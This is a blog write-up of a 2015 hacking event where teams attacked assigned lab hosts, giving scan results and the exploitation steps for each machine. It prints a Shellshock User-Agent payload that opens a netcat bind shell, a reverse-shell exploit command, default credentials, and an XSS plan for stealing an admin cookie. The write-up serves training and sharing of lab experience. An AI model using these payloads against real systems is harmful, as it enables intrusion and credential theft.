usd AG Hacker Day in Hamburg

Do you remember this usd AG hacker challenge write-up? This years hacking event organized by the same company took place in Hamburg. 9 hackers all over Germany were invited to pwn&0wn all the things. Every team was assigned a certain IP range that had to be pentested. Every host identified within the IP range was rootable. And that's pretty much the information we had before conducting the pentest. My team got the IP range 10.10.10.20-29. And now let's have a look at my notes I've taken during the hacking session.

Targets

First run nmap for assigned IP range (10.10.10.20-29):

$ nmap -A -T4 10.10.10.20-29

10.10.10.20

1) Nmap results:

Nmap scan report for 10.10.10.20
Host is up (0.0025s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
| ssh-hostkey: 
|   1024 0b:2e:f0:93:f8:ad:8f:b7:c4:c2:1c:d2:d1:24:98:dc (DSA)
|   2048 c3:d5:b8:52:a9:3b:a7:79:83:2a:21:4f:81:4f:3f:d9 (RSA)
|_  256 d0:9e:0d:5c:c8:14:46:e5:10:c4:d9:85:12:33:37:0d (ECDSA)
80/tcp  open  http    Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          47289/tcp  status
|_  100024  1          52014/udp  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

2) Nikto results:

- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.10.20
+ Target Hostname:    10.10.10.20
+ Target Port:        80
+ Start Time:         2015-06-03 17:36:01 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Server leaks inodes via ETags, header found with file /, inode: 133083, size: 177, mtime: 0x513d254c3afa1
+ The anti-clickjacking X-Frame-Options header is not present.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3268: /private/: Directory indexing found.
+ OSVDB-3092: /private/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6545 items checked: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2015-06-03 17:36:26 (GMT2) (25 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


Observations:


  • Old version of Apache
  • Strange ports open: 47289/tcp, 52014/udp
  • http://10.10.10.20/private/info.txt contained:

      [email protected]:# 
      [email protected]:# mail 
      [email protected]:# hostname


Solutions:


  • Login to machine per SSH using user:user
  • Use a vulnerability in rbash (restricted bash) in order to run a normal bash
  • Check out crontab
  • Modify crontab entry to run commands as root

10.10.10.21

1) Nmap results:

Nmap scan report for 10.10.10.21
Host is up (0.0024s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.5p1 Debian 6+squeeze2 (protocol 2.0)
| ssh-hostkey: 
|   1024 b8:08:0f:30:c2:68:ad:14:da:f3:aa:4f:ed:81:23:5d (DSA)
|_  2048 c5:99:11:f8:7a:9e:4c:0a:48:30:8b:9d:51:e6:3f:4f (RSA)
80/tcp open  http    Apache httpd 2.2.16 ((Debian))
| http-methods: Potentially risky methods: PUT DELETE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

2) Nikto results:

- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.10.21
+ Target Hostname:    10.10.10.21
+ Target Port:        80
+ Start Time:         2015-06-03 14:44:40 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.16 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0xW/319 0x1356645490000 
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.16 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ Cookie JSESSIONID created without the httponly flag
+ OSVDB-3720: /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users.
+ OSVDB-68662: /axis2/axis2-web/HappyAxis.jsp: SAP BusinessObjects dswsbobje.war deploys Axis2 with a static admin password. See http://www.rapid7.com/security-center/advisories/R7-0037.jsp
+ /axis2/axis2-web/HappyAxis.jsp: Apache Axis2 was found
+ /manager/html: Default Tomcat Manager interface found
+ 6545 items checked: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2015-06-03 14:45:56 (GMT2) (76 seconds)
---------------------------------------------------------------------------


Observations:


  • Old version of SSH server
  • Old version of Apache server running Apache Tomcat
  • HTTP methods PUT and DELETE are available
  • The sever is hosting an Axis2 instance


Solutions:


  • Login to Axis2 admin area using admin:axis2 (default password)
  • Upload a vulnerable service to Axis2 using metasploit (exploit/multi/http/axis2_deployer)
  • Fire a new shell (as user tomcat)
  • Have a look at /etc/passwd and notice that user is a "Debian Live User"
  • Google for Debians live user default password (=live)
  • Login using user:live
  • sudo su --> root

10.10.10.22

1) Nmap results:

Nmap scan report for 10.10.10.22
Host is up (0.0023s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 03:d3:10:1a:5e:9b:f8:32:25:e9:af:e1:3f:5b:61:45 (DSA)
|_  2048 a2:4d:a5:aa:2a:e4:50:3d:03:cf:f6:5d:d7:e1:75:26 (RSA)
80/tcp   open  http    Apache httpd 2.2.3 ((CentOS))
| http-methods: Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind 2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            873/udp  status
|_  100024  1            876/tcp  status
3306/tcp open  mysql   MySQL (unauthorized)

2) Nikto results:

- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP:          10.10.10.22
+ Target Hostname:    10.10.10.22
+ Target Port:        80
+ Start Time:         2015-06-03 14:53:14 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (CentOS)
+ Server leaks inodes via ETags, header found with file /, inode: 1360390, size: 65, mtime: 0x5068ebf68ea80
+ The anti-clickjacking X-Frame-Options header is not present.
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6545 items checked: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2015-06-03 14:54:40 (GMT2) (86 seconds)
---------------------------------------------------------------------------


Observations:


  • Old version of SSH server
  • Old version of Apache server running
  • MySQL server is exposed to 0.0.0.0


Solutions:


  • Looking at the web application we've found this:

      $ curl -v "http://10.10.10.22/cgi-bin/hello.sh?hacker"
      *   Trying 10.10.10.22...
      * Connected to 10.10.10.22 (10.10.10.22) port 80 (#0)
      > GET /cgi-bin/hello.sh?hacker HTTP/1.1
      > Host: 10.10.10.22
      > User-Agent: curl/7.42.1
      > Accept: */*
      > 
      < HTTP/1.1 200 OK
      < Date: Wed, 03 Jun 2015 15:56:24 GMT
      < Server: Apache/2.2.3 (CentOS)
      < Content-Length: 13
      < Connection: close
      < Content-Type: text/plain; charset=UTF-8
      < 
      hello hacker
      * Closing connection 0
  • Modifying the parameters lead to:

      $ curl -v "http://10.10.10.22/cgi-bin/hello.sh?hacker;asdk;ping alkjsd"
      *   Trying 10.10.10.22...
      * Connected to 10.10.10.22 (10.10.10.22) port 80 (#0)
      > GET /cgi-bin/hello.sh?hacker;asdk;ping alkjsd HTTP/1.1
      > Host: 10.10.10.22
      > User-Agent: curl/7.42.1
      > Accept: */*
      > 
      < HTTP/1.1 200 OK
      < Date: Wed, 03 Jun 2015 15:56:33 GMT
      < Server: Apache/2.2.3 (CentOS)
      < Content-Length: 25
      < Connection: close
      < Content-Type: text/plain; charset=UTF-8
      < 
      hello hacker\;asdk\;ping
      * Closing connection 0
  • Apache, cgi-bin, hello.sh ... That looked like a potential shellshock attack:

      $ curl -v -H "$(cat request)" "http://10.10.10.22/cgi-bin/hello.sh?hacker"
      *   Trying 10.10.10.22...
      * Connected to 10.10.10.22 (10.10.10.22) port 80 (#0)
      > GET /cgi-bin/hello.sh?hacker HTTP/1.1
      > Host: 10.10.10.22
      > Accept: */*
      > User-Agent: () { :;}; /bin/bash -c 'nc -l -p 4445 -e /bin/bash &'
      > 
      < HTTP/1.1 500 Internal Server Error
      < Date: Wed, 03 Jun 2015 15:57:10 GMT
      < Server: Apache/2.2.3 (CentOS)
      < Content-Length: 610
      < Connection: close
      < Content-Type: text/html; charset=iso-8859-1
      < 
      <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
      <html><head>
      <title>500 Internal Server Error</title>
      </head><body>
      <h1>Internal Server Error</h1>
      <p>The server encountered an internal error or
      misconfiguration and was unable to complete
      your request.</p>
      <p>Please contact the server administrator,
       [email protected] and inform them of the time the error occurred,
      and anything you might have done that may have
      caused the error.</p>
      <p>More information about this error may be available
      in the server error log.</p>
      <hr>
      <address>Apache/2.2.3 (CentOS) Server at 10.10.10.22 Port 80</address>
      </body></html>
      * Closing connection 0

    In the above curl output you can see that the User-Agent contains the payload:

      * run **netcat** and listen on port **4445**
      * when connecting to this port a new **bash** instance should be spawned
  • Unfortunately the manual way didn't work so we've found this Apache mod_cgi - ShellshockRemote Exploit:

      $ wget https://www.exploit-db.com/download/34900 -o shellshock.py
    $ python2 shellshock.py payload=reverse rhost=10.10.10.22 \
          lhost=10.10.10.95 lport=4447 pages=http://10.10.10.22/cgi-bin/hello.sh
      ...

    That will give you a reverse shell on port 4447.

  • Havin the shell access to the machine we've stared investigating the permissions on the file system. We've found out that current user (www-data I think) was able to read files inside /root.

      10.10.10.22> ls -l
          total 36
          -rw-r--r-- 1 root root 20396 May 18  2014 install.log
          -rw-r--r-- 1 root root  3148 May 18  2014 install.log.syslog
          -rw-r--r-- 1 root root    13 Feb 25 07:56 password-for-vpn.txt
    
      10.10.10.22> cat password-for-vpn.txt
      VeRySeCuRe_7
  • Loging in as user:VeRySeCuRe_7 per SSH was then successful

10.10.10.23

1) Nmap results:

Nmap scan report for 10.10.10.23
Host is up (0.0025s latency).
Not shown: 986 closed ports
PORT      STATE SERVICE       VERSION
25/tcp    open  smtp          SLmail smtpd 5.5.0.4433
| smtp-commands: mailer, SIZE 100000000, SEND, SOML, SAML, HELP, VRFY, EXPN, ETRN, XTRN, 
|_ This server supports the following commands. HELO MAIL RCPT DATA RSET SEND SOML SAML HELP NOOP QUIT 
79/tcp    open  finger        SLMail fingerd
|_finger: Finger online user list request denied.
106/tcp   open  pop3pw        SLMail pop3pw
110/tcp   open  pop3          BVRP Software SLMAIL pop3d
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  netbios-ssn
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49156/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: mailer; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Enterprise 7601 Service Pack 1 (Windows 7 Enterprise 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: mailer
|   NetBIOS computer name: MAILER
|   Workgroup: WORKGROUP
|_  System time: 2015-06-03T14:35:31+02:00
| smb-security-mode: 
|   Account that was used for smb scripts: <blank>
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol


Observations:


  • It's a Windows box :D
  • A lot of services are exposed
  • There is a smtpd running on port 25 (that might be interesting)


Solution:


  • Search in metasploit for SLmail smtpd 5.5.0.4433
  • Use found exploit to gain access to the machine
  • And voila you're logged in as admin

10.10.10.24

1) Nmap results:

Nmap scan report for 10.10.10.24
Host is up (0.0026s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.5p1 Debian 6+squeeze4 (protocol 2.0)
| ssh-hostkey: 
|   1024 5e:c5:45:45:52:12:47:04:1d:cc:b5:28:ca:91:5d:6c (DSA)
|_  2048 e3:29:e3:18:43:20:3d:c7:be:a9:7f:13:62:99:06:10 (RSA)
80/tcp open  http    Apache httpd 2.2.16 ((Debian))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: PentesterLab vulnerable blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 10 IP addresses (5 hosts up) scanned in 66.17 seconds

2) Nikto results:

- Nikto v2.1.5
 ---------------------------------------------------------------------------
 + Target IP:          10.10.10.24
 + Target Hostname:    10.10.10.24
 + Target Port:        80
 + Start Time:         2015-06-03 15:00:49 (GMT2)
 ---------------------------------------------------------------------------
 + Server: Apache/2.2.16 (Debian)
 + Retrieved x-powered-by header: PHP/5.3.3-7+squeeze18
 + The anti-clickjacking X-Frame-Options header is not present.
 + OSVDB-630: IIS may reveal its internal or real IP in the Location header via a request to the /images directory. The value is "http://127.0.0.1/images/".
 + Apache/2.2.16 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
 + Server leaks inodes via ETags, header found with file /favicon.ico, inode: 6756, size: 14634, mtime: 0x4e1d6b3f0db40
 + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
 + Cookie PHPSESSID created without the httponly flag
 + OSVDB-5034: /admin/login.php?action=insert&username=test&password=test: phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 't
 est' password 'test' to verify.
 + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
 + OSVDB-3268: /icons/: Directory indexing found.
 + OSVDB-3268: /images/: Directory indexing found.
 + OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
 + OSVDB-3233: /icons/README: Apache default file found.
 + /admin/login.php: Admin login page/section found.
 + 6545 items checked: 0 error(s) and 14 item(s) reported on remote host
 + End Time:           2015-06-03 15:01:58 (GMT2) (69 seconds)


Observations:


  • It's a blog system
  • Authentification is done via session id (=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000)
  • There is an admin area (/admin/login.php)


Solution:


  • Inside the comments section you can store a persistent XSS
  • There is a cronjob which "visits" the site logged in as admin
  • The main idea was to steal admins sesssion using the XSS:

    • Create XSS payload and send document.cookie to a box listening on a certain port
    • Using netcat you had to listen for the incomming request which exposed admins session
    • Once you have stolen the session you could use it to access the admin area
  • Inside the admin area there was a SQLi which you could use to read files from filesystem

  • Having read /etc/passwd you were to see which users were available on the box
  • Log in as user:live to the machine (per SSH)
  • ? (I can't remember the last step(s) xD)

Conclusion

I'd like to thank usd AG for the organizational part and all participants for having a great time in Hamburg City.


Prev: Validating and pinning X.509 certificates
Next: Debugging Android native shared libraries

comments powered by Disqus
Published:
2015-06-03 00:00
category:
Tag:
ctf10